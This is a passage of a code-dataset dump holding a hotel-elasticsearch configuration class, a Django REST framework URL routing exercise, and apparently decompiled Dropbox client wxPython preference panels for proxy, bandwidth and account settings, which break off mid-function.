Save to config_dir\n :return:\n \"\"\"\n with open(self.config_file, 'w') as f:\n config = yaml.safe_dump(dict(self), default_flow_style=False)\n f.write(config)\n\n\nclass HotelElasticSearchConfig(OrderedDict):\n def __init__(self, config_file=\"/etc/hotel-elasticsearch/hotel-config.yml\"):\n try:\n with open(config_file) as f:\n super(HotelElasticSearchConfig, self).__init__(sorted(yaml.safe_load(f.read()).items()))\n except FileNotFoundError:\n logger.warning(f\"Config file {config_file} not found, using defaults\")\n\n # Set defaults\n if 'hotel' not in self:\n self['hotel'] = OrderedDict()\n if 'alerting' not in self['hotel']:\n self['hotel']['alerting'] = OrderedDict()\n if 'alerter' not in self['hotel']['alerting']:\n self['hotel']['alerting']['alerter'] = None\n if 'backup' not in self['hotel']:\n self['hotel']['backup'] = OrderedDict()\n if 'bucket' not in self['hotel']['backup']:\n self['hotel']['backup']['bucket'] = 'hotel-elasticsearch-backup'\n\n\n\n","repo_name":"plecto/hotel-elasticsearch","sub_path":"hotel_elasticsearch/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29193533710","text":"from django.urls import re_path\nfrom rest_framework.routers import SimpleRouter\n\nfrom .view import serializer_view, generic_view, child_view, mixin_view, api_view, viewset_view, genericViewset_view, \\\n modelviewset\n\nurlpatterns = [\n # 多对象\n re_path(r'books$', serializer_view.Books.as_view()),\n # 单对象\n re_path(r'book/(?P\\d)$', serializer_view.Book.as_view()),\n\n # APIView多对象\n re_path(r'apibooks$', api_view.Books.as_view()),\n # APIView单对象\n re_path(r'apibook/(?P\\d)$', api_view.Book.as_view()),\n\n # genericView多对象\n re_path(r'gnbooks$', generic_view.Books.as_view()),\n # genericView单对象\n re_path(r'gnbook/(?P\\d)$', generic_view.Book.as_view()),\n\n # genericView多对象+mixin\n re_path(r'mxbooks$', mixin_view.Books.as_view()),\n # genericView单对象+mixin\n re_path(r'mxbook/(?P\\d)$', mixin_view.Book.as_view()),\n\n # genericView多对象+mixin集合子类\n re_path(r'chbooks$', child_view.Books.as_view()),\n # genericView单对象+mixin集合子类\n re_path(r'chbook/(?P\\d)$', child_view.Book.as_view()),\n\n # viewset\n re_path(r'vsbooks$', viewset_view.Books.as_view({'get': 'list', 'post': 'create'})),\n # viewset\n re_path(r'vsbook/(?P\\d)$', viewset_view.Book.as_view({'get': 'retrieve', 'put': 'updata'})),\n # viewset自定义方法名匹配\n re_path(r'vsbooks/test$', viewset_view.Books.as_view({'get': 'list', 'post': 'create', 'put': 'test'})),\n\n # genericviewset\n re_path(r'gvsbooks$', genericViewset_view.Books.as_view({'get': 'list', 'post': 'create'})),\n # genericviewset\n re_path(r'gvsook/(?P\\d)$', genericViewset_view.Book.as_view({'get': 'retrieve', 'put': 'updata'})),\n # genericviewset自定义方法名匹配\n re_path(r'gvsbooks/test$', genericViewset_view.Books.as_view({'get': 'list', 'post': 'create', 'put': 'test'})),\n\n # modelviewset\n re_path(r'mdbooks$', modelviewset.Books.as_view({'get': 'list', 'post': 'create'})),\n # modelviewset\n re_path(r'mdsook/(?P\\d)$', modelviewset.Book.as_view({'get': 'retrieve', 'put': 'updata'})),\n]\n\n# 自动生成路由\nrouter = SimpleRouter() # 创建对象\nrouter.register('zdybooks', modelviewset.Books, basename='books') # 路径+调用的方法+路由命名\nrouter.register('zdyffbooks', modelviewset.Books)\nurlpatterns += router.urls # 自动生成的路由添加到路由列表\nprint(urlpatterns)\n\n","repo_name":"Kaplc/Drf-Learn","sub_path":"drf_learn/drf_learn/apps/books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2714247021","text":"#Embedded file name: ui/wxpython/preferences.py\nfrom __future__ import absolute_import\nimport itertools\nimport functools\nimport sys\nimport wx\nfrom build_number import VERSION\nimport arch\nfrom dropbox.features import feature_enabled\nfrom dropbox.globals import dropbox_globals\nfrom dropbox.gui import assert_message_queue, event_handler, message_sender, spawn_thread_with_name\nimport dropbox.i18n\nfrom dropbox.preferences import NO_PROXY, AUTO_PROXY, MANUAL_PROXY, OPT_BUBBLES, OPT_LANG, OPT_P2P, OPT_STARTUP, HTTP, SOCKS4, SOCKS5\nfrom dropbox.trace import TRACE, unhandled_exc_handler\nfrom dropbox.client.screenshots import ScreenshotsController\nfrom ui.wxpython.screenshots import ScreenshotsSelector\nimport ui.images\nfrom ..common.preferences import ValidPort, ValidBandwidth, pref_strings, change_client_language, PanelNames\nfrom ..common.selective_sync import selsync_strings\nfrom .camera import CameraUploadLauncher, PhotoImportLauncher\nfrom .constants import platform, GNOME\nfrom .dropbox_controls import TypeBox, SpinTypeBox, Throbber\nfrom .location_changer import DropboxLocationChanger\nfrom .selective_sync import SelectiveSyncLauncher\nfrom .static_link_text import StaticLinkText\nfrom .tabbedframe import DropboxTabbedFrame, InvalidEntryException, DropboxTabPanel\nif sys.platform.startswith('win'):\n from dropbox.win32.version import VISTA, WINDOWS_VERSION\n\nclass ProxySettingsPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsNetwork.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.proxy_tab_label\n\n @staticmethod\n def help_index():\n return 'proxies'\n\n @event_handler\n def read(self, state):\n if state['proxy_mode'] == NO_PROXY:\n self.rb[0].SetValue(True)\n elif state['proxy_mode'] == AUTO_PROXY:\n self.rb[1].SetValue(True)\n else:\n self.rb[2].SetValue(True)\n self.proxy_type_choice.SetStringSelection(state['proxy_type'])\n self.server_text.SetValue(state['proxy_server'])\n self.port_nsbox.SetValue(state['proxy_port'])\n self.auth_req.SetValue(state['proxy_requires_auth'])\n self.user_text.SetValue(state['proxy_username'])\n self.pass_text.SetValue(state['proxy_password'])\n self.handle_proxy_choice(None)\n self.handle_prox_type_choice(None)\n\n @event_handler\n def save(self, theEvent):\n state = {}\n if self.rb[0].GetValue():\n state['proxy_mode'] = NO_PROXY\n elif self.rb[1].GetValue():\n state['proxy_mode'] = AUTO_PROXY\n else:\n state['proxy_mode'] = MANUAL_PROXY\n state['proxy_type'] = self.proxy_type_choice.GetStringSelection()\n state['proxy_server'] = self.server_text.GetValue()\n try:\n state['proxy_port'] = self.port_nsbox.GetValue()\n except TypeBox.EntryErrors:\n raise InvalidEntryException(self.__class__, pref_strings.proxy_port_error)\n\n state['proxy_requires_auth'] = self.auth_req.GetValue()\n state['proxy_username'] = self.user_text.GetValue()\n state['proxy_password'] = self.pass_text.GetValue()\n return state\n\n @event_handler\n def handle_proxy_choice(self, theEvent):\n for win in [self.proxlbl,\n self.proxy_type_choice,\n self.slbl,\n self.server_text,\n self.port_nsbox,\n self.auth_req,\n self.ulbl,\n self.passlbl,\n self.user_text,\n self.pass_text]:\n win.Enable(self.rb[2].GetValue())\n\n self.handle_prox_type_choice(theEvent)\n\n @event_handler\n def handle_prox_type_choice(self, theEvent):\n for win in [self.auth_req,\n self.ulbl,\n self.passlbl,\n self.user_text,\n self.pass_text]:\n win.Enable(self.rb[2].GetValue() and self.proxy_type_choice.GetStringSelection() in (HTTP, SOCKS5))\n\n self.handle_auth_checkbox(theEvent)\n\n @event_handler\n def handle_auth_checkbox(self, theEvent):\n for win in [self.ulbl,\n self.passlbl,\n self.user_text,\n self.pass_text]:\n win.Enable(self.auth_req.GetValue() and self.rb[2].GetValue() and self.proxy_type_choice.GetStringSelection() in (HTTP, SOCKS5))\n\n self.invalidate(theEvent)\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(ProxySettingsPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n border = self.border = wx.BoxSizer(wx.VERTICAL)\n if self.has_own_borders:\n proxy_box = wx.StaticBox(self)\n pb_sizer = wx.StaticBoxSizer(proxy_box, wx.VERTICAL)\n TypeBox_t = TypeBox\n else:\n TypeBox_t = SpinTypeBox\n self.up_self = up_self = wx.Panel(self)\n self.rb = rb = [wx.RadioButton(up_self, label=pref_strings.no_proxy_choice, style=wx.RB_GROUP), wx.RadioButton(up_self, label=pref_strings.auto_proxy_choice), wx.RadioButton(up_self, label=pref_strings.manual_proxy_choice)]\n windows_wx_bug_workaround = wx.RadioButton(up_self, style=wx.RB_GROUP)\n windows_wx_bug_workaround.Show(False)\n\n def cell():\n up_sizer.AddSpacer(wx.Size(0, 0))\n\n up_sizer = wx.FlexGridSizer(cols=5)\n up_self.SetSizer(up_sizer)\n self.proxy_settings_lbl = proxy_settings_lbl = wx.StaticText(up_self, label=pref_strings.proxy_settings_label)\n up_sizer.AddStretchSpacer()\n up_sizer.Add(proxy_settings_lbl, border=platform.statictext_baseline_adjustment_to_match_radio, flag=wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT | wx.BOTTOM)\n up_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n up_sizer.Add(rb[0], flag=wx.LEFT | wx.ALIGN_BOTTOM)\n up_sizer.AddStretchSpacer()\n up_sizer.AddSpacer(wx.Size(0, platform.radio_group_spacer))\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n up_sizer.Add(rb[1], flag=wx.LEFT)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.radio_group_spacer))\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n up_sizer.Add(rb[2], flag=wx.LEFT, border=0)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.radio_group_spacer))\n cell()\n cell()\n cell()\n cell()\n self.proxlbl = proxlbl = wx.StaticText(up_self, label=pref_strings.proxy_type_label)\n self.proxy_type_choice = proxy_type_choice = wx.Choice(up_self, choices=[HTTP, SOCKS4, SOCKS5])\n proxy_type_choice.Bind(wx.EVT_CHOICE, self.handle_prox_type_choice)\n cell()\n up_sizer.Add(proxlbl, border=platform.statictext_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n cell()\n up_sizer.Add(proxy_type_choice, border=platform.choice_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n cell()\n cell()\n cell()\n cell()\n if platform == GNOME:\n port_size = 60\n else:\n port_size = 48\n self.slbl = slbl = wx.StaticText(up_self, label=pref_strings.proxy_server_label)\n self.server_text = server_text = wx.TextCtrl(up_self, value='', size=wx.Size(platform.username_textctrl_width, -1))\n self.port_nsbox = TypeBox_t(up_self, ValidPort, size=wx.Size(port_size, -1), on_text=[self.invalidate])\n server_text_and_more_hsizer = wx.BoxSizer(wx.HORIZONTAL)\n server_text_and_more_hsizer.Add(server_text)\n server_text_and_more_hsizer.AddSpacer(wx.Size(platform.textctrl_statictext_horizontal_spacing / 2, 0))\n server_text_and_more_hsizer.Add(wx.StaticText(up_self, label=':'), border=1, flag=wx.BOTTOM | wx.ALIGN_CENTER_VERTICAL)\n server_text_and_more_hsizer.AddSpacer(wx.Size(platform.textctrl_statictext_horizontal_spacing / 2, 0))\n server_text_and_more_hsizer.Add(self.port_nsbox)\n cell()\n up_sizer.Add(slbl, border=platform.statictext_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n cell()\n up_sizer.Add(server_text_and_more_hsizer, border=platform.textctrl_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM)\n cell()\n self.auth_req = auth_req = wx.CheckBox(up_self, label=pref_strings.proxy_requires_password_checkbox)\n self.auth_req.Bind(wx.EVT_CHECKBOX, self.handle_auth_checkbox)\n up_sizer.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n up_sizer.Add(auth_req, border=platform.checkbox_baseline_adjustment, flag=wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL | wx.BOTTOM)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n cell()\n cell()\n cell()\n cell()\n self.ulbl = ulbl = wx.StaticText(up_self, label=pref_strings.proxy_username_label)\n self.user_text = user_text = wx.TextCtrl(up_self, value='', size=wx.Size(platform.username_textctrl_width, -1))\n cell()\n up_sizer.Add(ulbl, border=platform.statictext_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM | wx.ALIGN_RIGHT)\n up_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n up_sizer.Add(user_text, border=platform.textctrl_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n cell()\n self.passlbl = passlbl = wx.StaticText(up_self, label=pref_strings.proxy_password_label)\n self.pass_text = pass_text = wx.TextCtrl(up_self, value='', size=wx.Size(platform.username_textctrl_width, -1), style=wx.TE_PASSWORD)\n up_sizer.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n cell()\n cell()\n cell()\n cell()\n cell()\n up_sizer.Add(passlbl, border=platform.statictext_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM | wx.ALIGN_RIGHT)\n up_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n up_sizer.Add(pass_text, border=platform.textctrl_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.swap_panel_border))\n cell()\n cell()\n cell()\n cell()\n the_sizer = pb_sizer if self.has_own_borders else border\n self.Bind(wx.EVT_RADIOBUTTON, self.handle_proxy_choice)\n the_sizer.Add(up_self, proportion=0, flag=wx.RIGHT | wx.LEFT | wx.TOP | wx.EXPAND, border=platform.radio_static_box_interior)\n if self.has_own_borders:\n border.Add(pb_sizer, border=16, flag=wx.BOTTOM | wx.EXPAND)\n self.Bind(wx.EVT_TEXT, self.invalidate)\n self.SetSizer(border)\n self.Layout()\n\n\nclass BandwidthSettingsPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsBandwidth.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.bandwidth_tab_label\n\n @staticmethod\n def help_index():\n return 'bandwidth'\n\n @event_handler\n def read(self, state):\n self.upload_rb[state['throttle_upload_style']].SetValue(True)\n self.upload_box.SetValue(state['throttle_upload_speed'])\n if state['throttle_download_style'] == 2:\n self.download_rb[1].SetValue(True)\n else:\n self.download_rb[0].SetValue(True)\n self.download_box.SetValue(state['throttle_download_speed'])\n self.handle_upload_rb(None)\n self.handle_download_rb(None)\n\n @event_handler\n def save(self, theEvent):\n state = {}\n should_raise = False\n if self.download_rb[0].GetValue():\n state['throttle_download_style'] = 0\n else:\n state['throttle_download_style'] = 2\n try:\n state['throttle_download_speed'] = self.download_box.GetValue()\n except TypeBox.EntryErrors:\n should_raise = pref_strings.download_limit_error\n\n if self.upload_rb[0].GetValue():\n state['throttle_upload_style'] = 0\n elif self.upload_rb[1].GetValue():\n state['throttle_upload_style'] = 1\n else:\n state['throttle_upload_style'] = 2\n try:\n state['throttle_upload_speed'] = self.upload_box.GetValue()\n except TypeBox.EntryErrors:\n should_raise = pref_strings.upload_limit_error\n\n if should_raise is not False:\n raise InvalidEntryException(self.__class__, should_raise)\n return state\n\n @event_handler\n def handle_download_rb(self, theEvent):\n ability = self.download_rb[1].GetValue()\n self.download_box.Enable(ability)\n self.download_units.Enable(ability)\n self.invalidate(theEvent)\n\n @event_handler\n def handle_upload_rb(self, theEvent):\n ability = self.upload_rb[2].GetValue()\n self.upload_box.Enable(ability)\n self.upload_units.Enable(ability)\n self.invalidate(theEvent)\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(BandwidthSettingsPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n radio_interior = platform.radio_static_box_interior if self.has_own_borders else platform.radio_notebook_interior\n border = self.border = wx.BoxSizer(wx.VERTICAL)\n if self.has_own_borders:\n download_box = wx.StaticBox(self, label=pref_strings.download_label)\n download_sizer = wx.StaticBoxSizer(download_box, wx.VERTICAL)\n TypeBox_t = TypeBox\n else:\n download_sizer = wx.BoxSizer(wx.VERTICAL)\n download_label = wx.StaticText(self, label=pref_strings.download_label)\n font = download_label.GetFont()\n font.SetWeight(wx.FONTWEIGHT_BOLD)\n download_label.SetFont(font)\n download_sizer.Add(download_label, flag=wx.ALIGN_LEFT)\n TypeBox_t = SpinTypeBox\n self.download_rb = [wx.RadioButton(self, label=pref_strings.dont_limit_download, style=wx.RB_GROUP), wx.RadioButton(self, label=pref_strings.speed_limit_download)]\n for rb in self.download_rb:\n self.Bind(wx.EVT_RADIOBUTTON, self.handle_download_rb, rb)\n\n second_row_download_sizer = wx.BoxSizer(wx.HORIZONTAL)\n second_row_download_sizer.Add(self.download_rb[1], border=platform.radio_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_LEFT)\n second_row_download_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n self.download_box = TypeBox_t(self, ValidBandwidth, size=wx.Size(50, -1), on_text=[self.invalidate])\n second_row_download_sizer.Add(self.download_box, border=platform.textctrl_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n second_row_download_sizer.AddSpacer(wx.Size(platform.textctrl_statictext_horizontal_spacing, 0))\n self.download_units = wx.StaticText(self, label=pref_strings.rate_units)\n second_row_download_sizer.Add(self.download_units, border=platform.statictext_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n second_row_download_sizer.AddStretchSpacer()\n download_sizer.Add(self.download_rb[0], flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.TOP | wx.RIGHT, border=radio_interior)\n download_sizer.AddSpacer(wx.Size(0, platform.top_of_baselined_textctrl_to_bottom_of_radio))\n download_sizer.Add(second_row_download_sizer, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border=radio_interior)\n border.Add(download_sizer, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n if self.has_own_borders:\n upload_box = wx.StaticBox(self, label=pref_strings.upload_label)\n upload_sizer = wx.StaticBoxSizer(upload_box, wx.VERTICAL)\n else:\n upload_sizer = wx.BoxSizer(wx.VERTICAL)\n upload_label = wx.StaticText(self, label=pref_strings.upload_label)\n font = upload_label.GetFont()\n font.SetWeight(wx.FONTWEIGHT_BOLD)\n upload_label.SetFont(font)\n upload_sizer.Add(upload_label, flag=wx.ALIGN_LEFT)\n self.upload_rb = [wx.RadioButton(self, label=pref_strings.dont_limit_upload, style=wx.RB_GROUP), wx.RadioButton(self, label=pref_strings.auto_limit_upload), wx.RadioButton(self, label=pref_strings.speed_limit_upload)]\n for rb in self.upload_rb:\n self.Bind(wx.EVT_RADIOBUTTON, self.handle_upload_rb, rb)\n\n second_row_upload_sizer = wx.BoxSizer(wx.HORIZONTAL)\n second_row_upload_sizer.Add(self.upload_rb[2], border=platform.radio_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_LEFT)\n second_row_upload_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n self.upload_box = TypeBox_t(self, ValidBandwidth, size=wx.Size(50, -1), on_text=[self.invalidate])\n second_row_upload_sizer.Add(self.upload_box, border=platform.textctrl_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n second_row_upload_sizer.AddSpacer(wx.Size(platform.textctrl_statictext_horizontal_spacing, 0))\n self.upload_units = wx.StaticText(self, label=pref_strings.rate_units)\n second_row_upload_sizer.Add(self.upload_units, border=platform.statictext_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n second_row_upload_sizer.AddStretchSpacer()\n upload_sizer.Add(self.upload_rb[0], flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.TOP | wx.RIGHT, border=radio_interior)\n upload_sizer.AddSpacer(wx.Size(0, platform.radio_group_spacer))\n upload_sizer.Add(self.upload_rb[1], flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.RIGHT, border=radio_interior)\n upload_sizer.AddSpacer(wx.Size(0, platform.top_of_baselined_textctrl_to_bottom_of_radio))\n upload_sizer.Add(second_row_upload_sizer, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border=radio_interior)\n border.Add(upload_sizer, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n windows_wx_bug_workaround = wx.RadioButton(self, style=wx.RB_GROUP)\n windows_wx_bug_workaround.Show(False)\n self.SetSizer(border)\n self.Layout()\n self.Bind(wx.EVT_TEXT, self.invalidate)\n\n\n@event_handler\ndef handle_unlink(self, theEvent):\n if self.dropbox_app.sync_engine and self.dropbox_app.sync_engine.status.is_true('importing'):\n wx.MessageDialog(self, pref_strings.unlink_while_importing, caption=pref_strings.unlink_warning_caption, style=wx.OK | wx.ICON_WARNING).ShowModal()\n return\n if 'displayname' in dropbox_globals:\n caption = pref_strings.unlink_dialog_caption_short_with_displayname % dict(displayname=dropbox_globals['displayname'])\n else:\n caption = pref_strings.unlink_dialog_caption_short\n if wx.MessageDialog(self, pref_strings.unlink_dialog_message, caption=caption, style=wx.OK | wx.CANCEL | wx.ICON_QUESTION).ShowModal() == wx.ID_OK:\n self.dropbox_app.restart_and_unlink()\n\n\n@event_handler\ndef handle_link_secondary(self, theEvent):\n self.link_secondary_button.Disable()\n self.dropbox_app.mbox.enable()\n\n\n@event_handler\ndef handle_unlink_secondary(self, theEvent):\n TRACE('!! unlinking')\n self.secondary_unlink_button.Disable()\n self.dropbox_app.mbox.unlink_secondary()\n\n\nclass WindowsAccountPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsAccount.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.account_tab_label\n\n @staticmethod\n def help_index():\n return 'account'\n\n def read(self, state):\n pass\n\n def save(self, theEvent):\n state = {}\n return state\n\n def set_url_info(self, url_info):\n self.url_info = url_info\n\n @event_handler\n def on_ctrldown(self, *n):\n pass\n\n @message_sender(wx.CallAfter)\n def sync_engine_is_valid(self, sync_engine):\n self.on_show()\n self.parent.resize_for_panel(type(self))\n\n @event_handler\n def on_show(self):\n assert self.dropbox_app.dropbox_url_info is not None, 'this should be set by now'\n if 'displayname' in dropbox_globals:\n self.a_box.SetLabel(pref_strings.account_info_with_displayname % dropbox_globals)\n if 'userdisplayname' in dropbox_globals and self.dropbox_app.dropbox_url_info.email:\n if self.dropbox_app.mbox.enabled:\n emails = self.dropbox_app.mbox.email_addresses\n account_text = pref_strings.multiaccount_linked % dict(user=dropbox_globals['userdisplayname'], personal_email=emails.personal, business_email=emails.business)\n else:\n account_text = pref_strings.account_linked_to_user % dict(user=dropbox_globals['userdisplayname'], email=self.dropbox_app.dropbox_url_info.email)\n self.unlink_button.Enable(True)\n elif self.dropbox_app.dropbox_url_info.email:\n account_text = pref_strings.account_linked_but_not_connected % dict(email=self.dropbox_app.dropbox_url_info.email)\n self.unlink_button.Enable(True)\n else:\n account_text = pref_strings.account_unlinked_display\n self.unlink_button.Enable(False)\n self.account_text.SetLabel(account_text)\n self.account_text.SetSize(wx.Size(100, self.account_text.GetBestSize().GetHeight()))\n self.Layout()\n self.parent.panel.Layout()\n self.account_text.Wrap(self.unlink_sizer.GetSize().GetWidth())\n self.Layout()\n self.parent.panel.Layout()\n\n @message_sender(wx.CallAfter)\n def on_secondary_link(self, linked):\n if self.dropbox_app.mbox.paired:\n primary_label = self.dropbox_app.mbox.unlink_labels.primary\n else:\n primary_label = pref_strings.unlink_button\n self.unlink_button.SetLabel(primary_label)\n self.reset_multiaccount_buttons()\n self.Layout()\n\n @event_handler\n def add_multiaccount_buttons(self):\n self.buttons_vertical_spacer = wx.BoxSizer(wx.VERTICAL)\n self.buttons_vertical_spacer.Add(wx.Size(0, platform.static_box_button_vertical_spacing))\n self.link_secondary_sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.a_sizer.Add(self.buttons_vertical_spacer)\n self.a_sizer.Add(self.link_secondary_sizer, flag=wx.EXPAND)\n self.reset_multiaccount_buttons()\n\n @event_handler\n def reset_multiaccount_buttons(self):\n mbox = self.dropbox_app.mbox\n if not mbox.paired:\n self.a_sizer.Hide(self.buttons_vertical_spacer)\n self.a_sizer.Hide(self.link_secondary_sizer)\n else:\n self.link_secondary_sizer.Clear(True)\n if mbox.enabled:\n secondary_label = mbox.unlink_labels.secondary\n secondary_button = wx.Button(self, label=secondary_label)\n self.secondary_unlink_button = secondary_button\n self.secondary_unlink_button.Bind(wx.EVT_BUTTON, functools.partial(handle_unlink_secondary, self))\n else:\n secondary_label = mbox.link_labels.secondary\n secondary_button = wx.Button(self, label=secondary_label)\n self.link_secondary_button = secondary_button\n self.link_secondary_button.Bind(wx.EVT_BUTTON, functools.partial(handle_link_secondary, self))\n self.link_secondary_sizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n self.link_secondary_sizer.Add(secondary_button, border=platform.button_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n self.a_sizer.Show(self.buttons_vertical_spacer)\n self.a_sizer.Show(self.link_secondary_sizer)\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(WindowsAccountPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n border = self.border = wx.BoxSizer(wx.VERTICAL)\n self.a_box = a_box = wx.StaticBox(self)\n a_boxsizer = wx.StaticBoxSizer(a_box, wx.HORIZONTAL)\n a_sizer = wx.BoxSizer(wx.VERTICAL)\n self.account_text = wx.StaticText(self, label='')\n a_sizer.Add(self.account_text, border=platform.statictext_baseline_adjustment, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.BOTTOM)\n self.version_text = wx.StaticText(self, label=pref_strings.buildkey_and_version_installed % dict(version_string=VERSION))\n self.version_text.Enable(False)\n a_sizer.Add(self.version_text, border=platform.statictext_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n if self.dropbox_app.mbox.paired:\n primary_label = self.dropbox_app.mbox.unlink_labels.primary\n else:\n primary_label = pref_strings.unlink_button\n self.unlink_sizer = unlink_sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.unlink_button = wx.Button(self, label=primary_label)\n self.unlink_button.Bind(wx.EVT_BUTTON, functools.partial(handle_unlink, self))\n unlink_sizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n unlink_sizer.Add(self.unlink_button, border=platform.button_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n a_sizer.Add(unlink_sizer, flag=wx.EXPAND)\n self.a_sizer = a_sizer\n self.add_multiaccount_buttons()\n a_boxsizer.Add(a_sizer, proportion=1, flag=wx.EXPAND | wx.ALL, border=platform.radio_static_box_interior)\n border.Add(a_boxsizer, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n dropbox_app.ui_kit.add_sync_engine_handler(self.sync_engine_is_valid)\n self.SetSizer(border)\n self.Layout()\n\n\nclass LinuxAccountPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsAccount.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.account_tab_label\n\n @staticmethod\n def help_index():\n return 'account'\n\n def read(self, state):\n pass\n\n def save(self, theEvent):\n return {}\n\n def set_url_info(self, url_info):\n self.url_info = url_info\n\n @event_handler\n def on_keyup(self, theEvent):\n if theEvent.KeyCode == wx.WXK_CONTROL:\n self.unlink_button.SetLabel(pref_strings.unlink_button)\n self.unlink_fix_perms = False\n theEvent.Skip()\n\n @event_handler\n def disambiguate_unlink(self, theEvent):\n if self.unlink_fix_perms:\n self.fix_permissions(theEvent)\n else:\n handle_unlink(self, theEvent)\n\n def on_ctrldown(self, *n):\n self.unlink_button.SetLabel(pref_strings.unlink_button_fix_perms)\n self.unlink_fix_perms = True\n\n @event_handler\n def fix_permissions(self, theEvent):\n self.unlink_button.SetLabel(pref_strings.unlink_button_fixing_perms)\n self.unlink_button.Enable(False)\n self.throbber.start()\n message_sender(spawn_thread_with_name('FIX_PERMS'), on_success=self.fix_perms_success, on_exception=self.fix_perms_failed, block=False, dont_post=lambda : False)(arch.fixperms.fix_whole_dropbox_permissions)(wx.CallAfter)\n\n @message_sender(wx.CallAfter)\n def fix_perms_success(self, failures):\n TRACE('finished fixing permissions')\n self.unlink_button.SetLabel(pref_strings.unlink_button)\n self.unlink_button.Enable(True)\n self.throbber.stop()\n self.throbber.Hide()\n wx.MessageDialog(self, pref_strings.fix_perms_worked_message, caption=pref_strings.fix_perms_worked_caption, style=wx.OK).ShowModal()\n\n @message_sender(wx.CallAfter)\n def fix_perms_failed(self, exc, exc_info):\n TRACE('failed to fix permissions')\n unhandled_exc_handler(exc_info=exc_info)\n self.unlink_button.SetLabel(pref_strings.unlink_button)\n self.unlink_button.Enable(True)\n self.throbber.stop()\n self.throbber.Hide()\n wx.MessageDialog(self, pref_strings.fix_perms_really_bad_error_message, 